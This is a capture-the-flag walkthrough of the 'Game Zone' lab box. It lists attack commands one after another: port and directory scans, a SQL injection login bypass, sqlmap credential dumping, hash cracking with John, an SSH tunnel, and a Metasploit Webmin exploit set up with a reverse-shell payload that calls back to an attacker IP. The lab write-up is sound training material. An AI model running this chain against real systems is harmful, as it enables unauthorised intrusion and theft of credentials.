Skip to content

THM - Game Zone

export TARGET=$(target)

Scan:Nmap

nmap -p- -A $TARGET

...
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
...

Scan:gobuster

gobuster dir --url $TARGET -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

SQLi in login form

Login: admin' or 1=1 -- -

SQLMap

sqlmap
    -> agent47
    -> ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14

John

echo "ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14" > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
  -> videogamer124

SSH into

ssh agent47@$TARGET
  -> videogamer124

Running ss to get a list of listening ports

We will use a tool called ss to investigate sockets running on a host. If we run ss -tulpn it will tell us what socket connections are running

Argument Description
-t Display TCP sockets
-u Display UDP sockets
-l Displays only listening sockets
-p Shows the process using the socket
-n Doesn't resolve service names
ss -tulpn
Netid State      Recv-Q Send-Q                              Local Address:Port                                             Peer Address:Port              
udp   UNCONN     0      0                                               *:10000                                                       *:*                  
udp   UNCONN     0      0                                               *:68                                                          *:*                  
tcp   LISTEN     0      128                                             *:22                                                          *:*                  
tcp   LISTEN     0      128                                            :::22                                                         :::*                  
tcp   LISTEN     0      128                                            :::80                                                         :::*   
tcp   LISTEN     0      80                                      127.0.0.1:3306                                                        *:*                  
tcp   LISTEN     0      128                                             *:10000                                                       *:*                  
ss -tlpn
Netid State      Recv-Q Send-Q                              Local Address:Port                                             Peer Address:Port              
tcp   LISTEN     0      128                                             *:22                                                          *:*                  
tcp   LISTEN     0      128                                            :::22                                                         :::*                  
tcp   LISTEN     0      128                                            :::80                                                         :::*   
tcp   LISTEN     0      80                                      127.0.0.1:3306                                                        *:*                  
tcp   LISTEN     0      128                                             *:10000                                                       *:*                  

Port 10000 is not available for us.

we don't have permission to check `cat /etc/iptables/rules.v4

On hacker machine

ssh -L 10000:127.0.0.1:10000 -f -N agent47@$(target)
  -> videogamer124

then on hacker machine we can go to http://localhost:10000/ login agent47 password videogamer124

Nmap

nmap -p 10000 -sC -sV -Pn localhost

Metasploit

msf6 > search 1.580
msf6 > use 0
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > show options

msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set username agent47
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set password videogamer124
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set rhost 127.0.0.1
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set payload cmd/unix/reverse
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set lhost 10.18.9.175
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > run

we have root